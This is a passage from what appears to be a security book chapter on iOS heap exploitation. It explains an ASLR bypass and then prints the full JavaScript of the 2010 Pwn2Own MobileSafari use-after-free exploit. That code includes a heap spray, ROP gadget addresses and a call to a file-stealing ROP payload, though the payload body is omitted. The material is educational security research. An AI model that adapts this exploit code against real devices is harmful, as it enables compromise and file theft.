} T1_DecoderRec;
The attacker then read a number of pointers, including parse_callback, and stored a ROP payload constructed with the knowledge obtained by the out-of-bounds read in the buildchar member. Finally, the attacker overwrote the parse_callback member and triggered a call to it. At that point, the ASLR-defeating ROP payload was executed.
In general, the burden of defeating ASLR and the lack of generic methods greatly increase the development effort that an attacker has to put into each exploit. More importantly, whereas in the past it was possible to get away with guesswork because libraries were not randomized, and constructing a payload was therefore not a problem, from 4.3 on an exploit must defeat ASLR to be successful.
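The reason a single leaked pointer is so valuable comes down to simple arithmetic: every address in a randomized image is shifted by the same amount. The Python sketch below only illustrates that arithmetic; the function names and all the addresses are made up and do not correspond to the Saffron exploit or to any real binary.

```python
def compute_slide(leaked_address, unslid_address):
    """Difference between where a known symbol is and where it would be without ASLR."""
    return leaked_address - unslid_address


def rebase(unslid_addresses, slide):
    """Apply the same shift to every address taken from the non-randomized image."""
    return [address + slide for address in unslid_addresses]


# Hypothetical values: a callback pointer read at run time and its static address.
slide = compute_slide(0x3A5F2C10, 0x30012C10)
print(hex(slide))
print([hex(address) for address in rebase([0x30020000], slide)])
```

Once the slide is known, addresses taken from the static image can be translated to their run-time locations, which is what makes an address-dependent payload possible again.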
The next section analyzes an exploit for MobileSafari that did not need to bypass ASLR.
This case study presents the Pwn2Own exploit used in 2010. For the scope of this chapter we have taken out the payload that was used because ROP concepts are properly explained and commented in a different chapter of the book.
The function pwn() is responsible for bootstrapping the exploit. The first thing it does is generate a JavaScript function that creates an array of strings. The strings are created using the fromCharCode() function, which guarantees that you create a string of the correct size (see the heap feng shui example in the discussion of exploitation techniques against TCMalloc for more details on the string implementation in WebKit). The generator takes the length of each string, which matches the size of the object that needs to be replaced (20 UChars, that is, 40 bytes), and the number of strings to allocate (4000 in this case). The remaining parameters specify the content of the string: it is filled with some exploit-specific data, and the rest is filled with an arbitrary value (0xCCCC).
The vulnerability itself is caused by attribute objects that were not properly deleted from the Node cache when the attributes were deallocated. The rest of the pwn() function takes care of allocating a number of attribute objects and removing them right after the allocation.
At this point the exploit triggers the garbage collector by calling the nodeSpray() function, which is the function generated at the beginning by genNodeSpray(). In addition to triggering the garbage collector, and thus making sure that the attributes are released by the allocator, it also replaces them with strings of the correct size.
The last step is to spray the heap with the shellcode that needs to be executed and trigger a call to a virtual function (focus() in this case). This way the first four bytes of the string that is used to replace the object act as a virtual table pointer and divert the execution to a location the attacker controls.
<html> <body onload="pwn()"> <script> function genNodeSpray3GS (len, count, addy1, addy2, ret1, ret2, c, objname) { var evalstr = "function nodeSpray() { for(var i = 0; i < " + count + "; i++) { "; evalstr += objname + "[i]" + " = String.fromCharCode("; var slide = 0x1c; for (var i = 0; i < len; i++) { if (i == 0 ) { evalstr += addy1; } else if (i == 1 || i == 17) { evalstr += addy2; evalstr += addy1 + slide; }else if(i == 18) { evalstr +=ret2; }else if(i == 19) { evalstr += ret1; } else if (i > 1 && i< 4) { evalstr += c; } else { evalstr += 0; } if (i != len-1) { evalstr += ","; } } evalstr += "); }}"; return evalstr; } function genNodeSpray (len, count, addy1, addy2, c, objname) { var evalstr = "function nodeSpray() { for (var i = 0; i < " + count + "; i++) { "; evalstr += objname + "[i]" + " = String.fromCharCode("; for (var i = 0; i < len; i++) { if (i == 0) { evalstr += addy1; } else if (i == 1) { evalstr += addy2; } else if (i > 1 && i< 4) { evalstr += c; } else { evalstr += 0; } if (i != len-1) { evalstr += ","; } } evalstr += "); }}"; return evalstr; } function pwn() { var obj = new Array(4000); var attrs = new Array(100); // Safari 4.0.5 (64 bit, both DEBUG & RELEASE) 74 bytes -> 37 UChars // Safari 4.0.5 (32 bit, both DEBUG & RELEASE) 40 bytes -> 20 UChars // MobileSafari/iPhone 3.1.3 40 bytes -> 20 UChars // 0x4a1c000 --> 0 open pages // 0x4d00000 --> 1 open page // 3g 0x5000000 //eval(genNodeSpray(20, 8000, 0x0000, 0x0500, 52428, "obj")); eval(genNodeSpray3GS (20, 4000, 0x0000, 0x0600, 0x328c, 0x23ef, 52428, "obj")); // iOS 3.1.3 (2G/3G): // gadget to gain control of SP, located at 0x33b4dc92 (libSystem) // // 33b4dc92 469d mov sp, r3 // 33b4dc94 bc1c pop {r2, r3, r4} // 33b4dc96 4690 mov r8, r2 // 33b4dc98 469a mov sl, r3 // 33b4dc9a 46a3 mov fp, r4 // 33b4dc9c bdf0 pop {r4, r5, r6, r7, pc} // // note that we need to use jumpaddr+1 to enter thumb mode // [for iOS 3.0 (2G/3G) use gadget at 0x31d8e6b4] // // // iOS 3.1.3 3GS: // // gadget to gain control 
of SP, a bit more involved we can't mov r3 in sp so we do it in two stages: // // 3298d162 6a07 ldr r7, [r0, #32] // 3298d164 f8d0d028 ldr.w sp, [r0, #40] // 3298d168 6a40 ldr r0, [r0, #36] // 3298d16a 4700 bx r0 // // r0 is a pointer to the crafted node. We point r7 to our crafted stack, and r0 to 0x328c23ee. // the stack pointer points to something we don't control as the node is 40 bytes long. // // 328c23ee f1a70d00 sub.w sp, r7, #0 ; 0x0 // 328c23f2 bd80 pop {r7, pc} // //3GS var trampoline = "123456789012" + encode_uint32(0x3298d163); //var ropshellcode = vibrate_rop_3_1_3_gs(); //we have to skip the first 28 bytes var ropshellcode = stealFile_rop_3_1_3_gs(0x600001c); //3G //var trampoline = "123456789012" + encode_uint32(0x33b4dc93); //var ropshellcode = vibrate_rop_3_1_3_g(); for(var i = 0; i < attrs.length; i++) { attrs[i] = document.createAttribute(‘PWN’); attrs[i].nodeValue = 0; } // dangling pointers are us. for(var i = 0; i < attrs.length; i++) { // bug trigger (used repeatedly to increase reliability) attrs[i].removeChild(attrs[i].childNodes[0]); } nodeSpray(); // no pages open: we can spray 10000 strings w/o SIGKILL // 1 page open: we can only spray 8000 strings w/o SIGKILL var retaddrs = new Array(20000); for(var i = 0; i < retaddrs.length; i++) { retaddrs[i] = trampoline + ropshellcode; } // use after free on WebCore::Node object // overwritten vtable pointer gives us control over PC attrs[50].childNodes[0].focus(); } </script> </body> </html>
A number of difficulties become apparent when it comes to determining the most appropriate testing infrastructure to use while developing an exploit.
You have a number of factors to consider when testing an exploit. First of all, the application version used for testing needs to be the same as or as close as possible to the one the exploit is supposed to work on. The allocator functioning on the testing platform needs to be as close as possible to the real one. Finally, there must be an easy way to test the exploit multiple times.
In general, while developing, it is always a good idea to have tools like diff for source code or BinDiff for binaries that allow you to explore the differences between the real system and the testing one.
In a similar fashion to the processes you've seen in the course of this chapter, where most of the tests were conducted on Mac OS X, it is often possible to use a virtual machine or a computer running Mac OS X to start the development. In fact, by diffing either the source code or the binary it is possible to identify the characteristics common to the testing environment and the deployment environment.
Usually, you can use two strategies to test an exploit. The first one starts by developing it for 32-bit Mac OS X (in a virtual machine in case you are dealing with the system heap), then porting it to a jailbroken iPhone, and finally, testing it on a non-jailbroken one. Using this method allows you to get around the problem of not having a debugger available on a non-jailbroken iPhone.
The second strategy is applicable only if the vulnerability can be reproduced in a test program. That is, it is possible to include the vulnerable library or framework in a test application to be deployed on a developer iPhone and mimic the triggering conditions from the test application. This strategy is rarely applicable, but when it is, it allows you to debug the exploit directly on the phone by using the Xcode debugging capabilities for iPhone applications.
Finally, it is vital not to make any assumptions about the capabilities of the exploit in the test environment. In fact, applications on the iPhone are sandboxed in a fashion that might be different from Mac OS X. Moreover, jailbreaking an iPhone severely changes the underlying security infrastructure of the phone, so it is always better to test the payload intended to be run with the exploit separately.
In Chapter 8 you see a few ideas on how to perform such testing.
This chapter explored the inner mechanisms of the two most used allocators on iOS. It used Mac OS X as a testing platform to do most of the grunt work involved in exploitation.
A number of techniques to control both TCMalloc and the system heap were explained. Specifically, this chapter strove to divide techniques based on the kinds of vulnerabilities for which they are the most suitable. You saw what challenges exploitation on newer versions of the iPhone firmware create, specifically the problem of creating a reliable and portable exploit due to ASLR.
Finally, you saw a real-life example of a MobileSafari exploit targeting iOS 3.1.3, and learned strategies to precisely test an exploit without incurring porting problems and wrong assumptions.